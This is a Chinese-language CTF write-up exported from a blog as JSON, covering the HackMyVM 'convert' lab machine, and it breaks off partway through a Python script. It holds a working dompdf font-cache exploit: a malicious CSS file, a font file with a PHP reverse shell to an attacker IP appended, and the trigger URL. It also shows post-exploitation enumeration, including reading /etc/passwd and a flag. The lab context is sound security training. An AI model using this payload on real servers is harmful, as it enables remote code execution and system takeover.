{"id":569,"date":"2024-04-15T21:09:04","date_gmt":"2024-04-15T13:09:04","guid":{"rendered":"http:\/\/162.14.82.114\/?p=569"},"modified":"2024-07-01T16:28:52","modified_gmt":"2024-07-01T08:28:52","slug":"569","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/569\/04\/15\/2024\/","title":{"rendered":"hmv[-_-]convert"},"content":{"rendered":"<h1>convert<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404152051999.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404152051999.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240415152131741\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404152051000.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404152051000.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240415152115086\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">rustscan -a 192.168.0.111 -- -A<\/code><\/pre>\n<pre><code class=\"language-text\">Open 192.168.0.111:22\nOpen 192.168.0.111:80\n\nPORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)\n| ssh-hostkey: \n|   256 d8:7a:1e:74:a2:1a:40:74:91:1f:81:9b:05:7c:9a:f6 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNIydUr81eDokIoIALo7fmXcLh0LIL3AV01R8dkDa\/hstw76PQZrUQQH56OoVcNkTAXYGFlgjho\/kBiYVVSsLGY=\n|   256 28:9f:f8:ce:7b:5d:e1:a7:fa:23:c1:fe:00:ee:63:24 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEKl\/6u9ozvyJq2EMKssVf0DlTM0fEBbFT5zvJ300ryg\n80\/tcp open  http    syn-ack nginx 1.22.1\n| http-methods: \n|_  Supported Methods: GET HEAD POST\n|_http-title: HTML to PDF\n|_http-server-header: nginx\/1.22.1\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<p>\u53ea\u626b\u5230\u4e86\u4e00\u4e2a<code>upload<\/code><\/p>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404152051001.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404152051001.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240415152257754\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper 
lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404152051002.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404152051002.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240415152312538\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u8f93\u5165\u81ea\u8eab\u7f51\u5740\uff0c\u751f\u6210\u4e86pdf\u6587\u4ef6\uff0c\u5c1d\u8bd5\u53cd\u5f39shell\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404152051003.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404152051003.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240415152648897\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u672a\u66fe\u6267\u884c\uff0c\u627e\u4e00\u4e0b\u76f8\u5173\u6f0f\u6d1e\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404152051004.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404152051004.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240415201155080\" style=\"zoom: 50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404152051005.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404152051005.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240415201207582\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404152051006.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404152051006.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240415152947149\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404152051007.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404152051007.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240415153403992\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404152051008.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404152051008.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240415154256137\" \/><\/div><\/p>\n<p>\u4f46\u662f\u5e76\u672a\u5f39\u56de\u6765\uff0c\u7ee7\u7eed\u5bfb\u627e\u6f0f\u6d1e\uff0c\u5c1d\u8bd5\uff1a<a 
href=\"https:\/\/exploit-notes.hdks.org\/exploit\/web\/dompdf-rce\/#exploitation\">https:\/\/exploit-notes.hdks.org\/exploit\/web\/dompdf-rce\/#exploitation<\/a><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/convert]\n\u2514\u2500# head evil.css\n@font-face {\n  font-family: &#039;evil&#039;;\n  src: url(&#039;http:\/\/192.168.0.143:8888\/evil.php&#039;);\n  font-weight: &#039;normal&#039;;\n  font-style: &#039;normal&#039;;\n}\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/convert]\n\u2514\u2500# tail evil.php                                                          \n\n88\n\n\ufffd\ufffd\ufffdD*\ufffd\ufffdD*\ufffd\ufffd\ufffd7*8\ufffd        Iw!2654&amp;#!&quot;&amp;5!#\ufffd\ufffdu\/CC\/\ufffd\/BB\/\ufffdu\ufffdwA\/\ufffdr\/AA\/\ufffd\/A\ufffd\ufffdY\ufffd\ufffd\ufffd        I\ufffd%!&quot;3!26=4&amp;#\ufffd\ufffd\ufffd.II.\ufffd.II.\ufffdGGGG\ufffd I@!&quot;3!2654&amp;##!&quot;&amp;5!!&quot;35!+32654&amp;#S\ufffd\ufffd&#039;77&#039;&#039;=&amp;77&amp;wA\ufffd? -- \ufffdA\ufffd\ufffd\n\n                \ufffd\ufffdM\ufffd-Y7\ufffd`\n                         0%A\ufffd-6\ufffd~=_&lt;\ufffd\n                                    \u0488\ufffdH\u0488\ufffdH\ufffd\ufffd\ufffd\ufffd%\ufffd\n%\ufffd%\ufffd%\ufffd%\ufffd%\ufffd%\ufffd\nR\ufffd\ufffd\ufffdb\n3\ufffd\ufffd\/\n    \ufffd\nD\n\ufffd?      &amp;\ufffd              !       
\ufffd       6       \ufffd\n                                                                        #\n4^\n\ufffdjsglyphjsglyphStefan Str\ufffd\ufffderStefan Str\ufffd\ufffderhttp:\/\/stefanstraesser.eu\/http:\/\/stefanstraesser.eu\/MITMIT2015 Stefan Str\ufffd\ufffder2015 Stefan Str\ufffd\ufffderVersion 1.0Version 1.0jsglyphjsglyphjsglyphjsglyphRegularRegularjsglyphjsglyphFont generated by IcoMoon.Font generated by IcoMoon.\n&lt;?php system(&quot;bash -c &#039;bash -i &gt;&amp; \/dev\/tcp\/192.168.0.143\/1234 0&gt;&amp;1&#039;&quot;); ?&gt;\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/convert]\n\u2514\u2500# head exp.html\n&lt;link rel=stylesheet href=&#039;http:\/\/192.168.0.143:8888\/evil.css&#039;&gt;\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/convert]\n\u2514\u2500# python3 -m http.server 8888\nServing HTTP on 0.0.0.0 port 8888 (http:\/\/0.0.0.0:8888\/) ...\n192.168.0.111 - - [15\/Apr\/2024 06:30:33] &quot;GET \/exp.html HTTP\/1.1&quot; 200 -\n192.168.0.111 - - [15\/Apr\/2024 06:30:33] &quot;GET \/evil.css HTTP\/1.1&quot; 200 -\n192.168.0.111 - - [15\/Apr\/2024 06:30:33] &quot;GET \/evil.php HTTP\/1.1&quot; 200 -\n^C\nKeyboard interrupt received, exiting.<\/code><\/pre>\n<p>\u5c1d\u8bd5\u8ba1\u7b97md5\uff0c\u7136\u540e\u8bbf\u95ee\u6fc0\u6d3b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/convert]\n\u2514\u2500# echo -n http:\/\/192.168.0.143:8888\/evil.php | md5sum\n88b29c6a283b62aea4343982856990f4  -\n\n\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/convert]\n\u2514\u2500# curl http:\/\/192.168.0.111\/dompdf\/lib\/fonts\/evil_normal_88b29c6a283b62aea4343982856990f4.php<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404152051009.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404152051009.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240415184716553\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">(remote) eva@convert:\/var\/www\/html\/dompdf\/lib\/fonts$ ls\nCourier-Bold.afm            DejaVuSansMono-BoldOblique.ttf  Helvetica-Bold.afm         dompdf_font_family_cache.dist.php\nCourier-BoldOblique.afm     DejaVuSansMono-BoldOblique.ufm  Helvetica-BoldOblique.afm  dompdf_font_family_cache.php\nCourier-Oblique.afm         DejaVuSansMono-Oblique.ttf      Helvetica-Oblique.afm      evil_normal_88b29c6a283b62aea4343982856990f4.php\nCourier.afm                 DejaVuSansMono-Oblique.ufm      Helvetica.afm              evil_normal_88b29c6a283b62aea4343982856990f4.ufm\nDejaVuSans-Bold.ttf         DejaVuSansMono.ttf              Helvetica.afm.php          mustRead.html\nDejaVuSans-Bold.ufm         DejaVuSansMono.ufm              Symbol.afm                 poppins_bold_87c49bf24d72f01a4af573680817521f.ttf\nDejaVuSans-BoldOblique.ttf  DejaVuSerif-Bold.ttf            Times-Bold.afm             poppins_bold_87c49bf24d72f01a4af573680817521f.ufm\nDejaVuSans-BoldOblique.ufm  DejaVuSerif-Bold.ufm            Times-Bold.afm.php         poppins_bold_87c49bf24d72f01a4af573680817521f.ufm.php\nDejaVuSans-Oblique.ttf      DejaVuSerif-BoldItalic.ttf      Times-BoldItalic.afm       poppins_normal_a62832bf75823019dc29c5a9c470d64d.ttf\nDejaVuSans-Oblique.ufm      DejaVuSerif-BoldItalic.ufm      Times-BoldItalic.afm.php   
poppins_normal_a62832bf75823019dc29c5a9c470d64d.ufm\nDejaVuSans.ttf              DejaVuSerif-Italic.ttf          Times-Italic.afm           poppins_normal_a62832bf75823019dc29c5a9c470d64d.ufm.php\nDejaVuSans.ufm              DejaVuSerif-Italic.ufm          Times-Roman.afm\nDejaVuSansMono-Bold.ttf     DejaVuSerif.ttf                 Times-Roman.afm.php\nDejaVuSansMono-Bold.ufm     DejaVuSerif.ufm                 ZapfDingbats.afm\n(remote) eva@convert:\/var\/www\/html\/dompdf\/lib\/fonts$ cd \/home\n(remote) eva@convert:\/home$ ls -la\ntotal 12\ndrwxr-xr-x  3 root root 4096 Feb 22 22:17 .\ndrwxr-xr-x 18 root root 4096 Feb 22 22:14 ..\ndrwx------  2 eva  eva  4096 Feb 24 10:09 eva\n(remote) eva@convert:\/home$ cd eva\n(remote) eva@convert:\/home\/eva$ ls -la\ntotal 32\ndrwx------ 2 eva  eva  4096 Feb 24 10:09 .\ndrwxr-xr-x 3 root root 4096 Feb 22 22:17 ..\nlrwxrwxrwx 1 root root    9 Feb 23 17:01 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 eva  eva   220 Feb 22 22:17 .bash_logout\n-rw-r--r-- 1 eva  eva  3526 Feb 22 22:17 .bashrc\n-rw-r--r-- 1 eva  eva   807 Feb 22 22:17 .profile\n-rw-r--r-- 1 root root    1 Feb 24 10:10 pdf_gen.log\n-rw-r--r-- 1 root root 2736 Feb 23 21:36 pdfgen.py\n-rw-r----- 1 eva  eva    33 Feb 23 17:16 user.txt\n(remote) eva@convert:\/home\/eva$ cat 
\/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\n_apt:x:42:65534::\/nonexistent:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:998:998:systemd Network Management:\/:\/usr\/sbin\/nologin\nsystemd-timesync:x:997:997:systemd Time Synchronization:\/:\/usr\/sbin\/nologin\nmessagebus:x:100:107::\/nonexistent:\/usr\/sbin\/nologin\navahi-autoipd:x:101:109:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nsshd:x:102:65534::\/run\/sshd:\/usr\/sbin\/nologin\neva:x:1000:1000:eva,,,:\/home\/eva:\/bin\/bash\n(remote) eva@convert:\/home\/eva$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\ncat: \/etc\/cron.weekly: Is a directory\ncat: \/etc\/cron.yearly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don&#039;t have to run the `crontab&#039;\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. 
These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# |  .------------- hour (0 - 23)\n# |  |  .---------- day of month (1 - 31)\n# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...\n# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# |  |  |  |  |\n# *  *  *  *  * user-name command to be executed\n17 *    * * *   root    cd \/ &amp;&amp; run-parts --report \/etc\/cron.hourly\n25 6    * * *   root    test -x \/usr\/sbin\/anacron || { cd \/ &amp;&amp; run-parts --report \/etc\/cron.daily; }\n47 6    * * 7   root    test -x \/usr\/sbin\/anacron || { cd \/ &amp;&amp; run-parts --report \/etc\/cron.weekly; }\n52 6    1 * *   root    test -x \/usr\/sbin\/anacron || { cd \/ &amp;&amp; run-parts --report \/etc\/cron.monthly; }\n#\n(remote) eva@convert:\/home\/eva$ cd \/var\/www\/html\n(remote) eva@convert:\/var\/www\/html$ ls -la\ntotal 24\ndrwxr-xr-x 4 eva  eva  4096 Feb 23 15:11 .\ndrwxr-xr-x 3 root root 4096 Feb 23 10:35 ..\ndrwxr-xr-x 4 eva  eva  4096 Feb 22 19:21 dompdf\n-rw-r--r-- 1 eva  eva  3098 Feb 23 15:11 index.php\n-rw-r--r-- 1 eva  eva  1130 Feb 22 15:23 style.css\ndrwxr-xr-x 2 eva  eva  4096 Apr 15 16:00 upload\n(remote) eva@convert:\/var\/www\/html$ cd ..\/\n(remote) eva@convert:\/var\/www$ ls -la\ntotal 12\ndrwxr-xr-x  3 root root 4096 Feb 23 10:35 .\ndrwxr-xr-x 12 root root 4096 Feb 23 10:35 ..\ndrwxr-xr-x  4 eva  eva  4096 Feb 23 15:11 html\n(remote) eva@convert:\/var\/www$ cd ..\n(remote) eva@convert:\/var$ ls -la\ntotal 48\ndrwxr-xr-x 12 root root  4096 Feb 23 10:35 .\ndrwxr-xr-x 18 root root  4096 Feb 22 22:14 ..\ndrwxr-xr-x  2 root root  4096 Apr 15 13:17 backups\ndrwxr-xr-x 11 root root  4096 Feb 23 19:05 cache\ndrwxr-xr-x 27 root root  4096 Feb 23 16:57 lib\ndrwxrwsr-x  2 root staff 4096 Sep 30  2023 
local\nlrwxrwxrwx  1 root root     9 Feb 22 22:10 lock -&gt; \/run\/lock\ndrwxr-xr-x  8 root root  4096 Apr 15 12:50 log\ndrwxrwsr-x  2 root mail  4096 Feb 22 22:10 mail\ndrwxr-xr-x  2 root root  4096 Feb 22 22:10 opt\nlrwxrwxrwx  1 root root     4 Feb 22 22:10 run -&gt; \/run\ndrwxr-xr-x  4 root root  4096 Feb 22 22:16 spool\ndrwxrwxrwt  4 root root  4096 Apr 15 16:09 tmp\ndrwxr-xr-x  3 root root  4096 Feb 23 10:35 www\n(remote) eva@convert:\/var$ mail\nbash: mail: command not found\n(remote) eva@convert:\/var$ cd backups\/\n(remote) eva@convert:\/var\/backups$ ls -la\ntotal 28\ndrwxr-xr-x  2 root root  4096 Apr 15 13:17 .\ndrwxr-xr-x 12 root root  4096 Feb 23 10:35 ..\n-rw-r--r--  1 root root 10802 Feb 23 19:06 apt.extended_states.0\n-rw-r--r--  1 root root  1116 Feb 23 10:35 apt.extended_states.1.gz\n-rw-r--r--  1 root root    65 Feb 22 22:34 apt.extended_states.2.gz\n(remote) eva@convert:\/var\/backups$ cd ..\/tmp\n(remote) eva@convert:\/var\/tmp$ ls -la\ntotal 16\ndrwxrwxrwt  4 root root 4096 Apr 15 16:09 .\ndrwxr-xr-x 12 root root 4096 Feb 23 10:35 ..\ndrwx------  3 root root 4096 Apr 15 12:50 systemd-private-f49fbb326e3a46fe90bdb67c6ab1e685-systemd-logind.service-ENrSBE\ndrwx------  3 root root 4096 Apr 15 12:50 systemd-private-f49fbb326e3a46fe90bdb67c6ab1e685-systemd-timesyncd.service-K8yvIC\n(remote) eva@convert:\/var\/tmp$ cd ..\n(remote) eva@convert:\/var$ cd \/home\/eva\n(remote) eva@convert:\/home\/eva$ ls -la\ntotal 32\ndrwx------ 2 eva  eva  4096 Feb 24 10:09 .\ndrwxr-xr-x 3 root root 4096 Feb 22 22:17 ..\nlrwxrwxrwx 1 root root    9 Feb 23 17:01 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 eva  eva   220 Feb 22 22:17 .bash_logout\n-rw-r--r-- 1 eva  eva  3526 Feb 22 22:17 .bashrc\n-rw-r--r-- 1 eva  eva   807 Feb 22 22:17 .profile\n-rw-r--r-- 1 root root    1 Feb 24 10:10 pdf_gen.log\n-rw-r--r-- 1 root root 2736 Feb 23 21:36 pdfgen.py\n-rw-r----- 1 eva  eva    33 Feb 23 17:16 user.txt\n(remote) eva@convert:\/home\/eva$ cat 
user.txt\nf2be48d6f922bfc0a9bf45b22887c10d\n(remote) eva@convert:\/home\/eva$ cat pdfgen.py\nfrom os import path\nfrom time import time\nfrom weasyprint import HTML, CSS\nfrom urllib.parse import urlparse\nfrom argparse import ArgumentParser\nfrom logging import basicConfig, INFO, error, info, exception\n\ndef prune_log(log_file, max_size=1):\n    try:\n        log_size = path.getsize(log_file) \/ (1024 * 1024)\n        if log_size &gt; max_size:\n            with open(log_file, &#039;w&#039;):\n                pass\n            info(f&quot;Log file pruned. Size exceeded {max_size} MB.&quot;)\n            print(f&quot;Log file pruned. Size exceeded {max_size} MB.&quot;)\n    except Exception as e:\n        print(f&quot;Error pruning log file: {e}&quot;)\n\nlog_file = &#039;\/home\/eva\/pdf_gen.log&#039;\nprune_log(log_file)\nbasicConfig(level=INFO, filename=log_file, filemode=&#039;a&#039;,\n            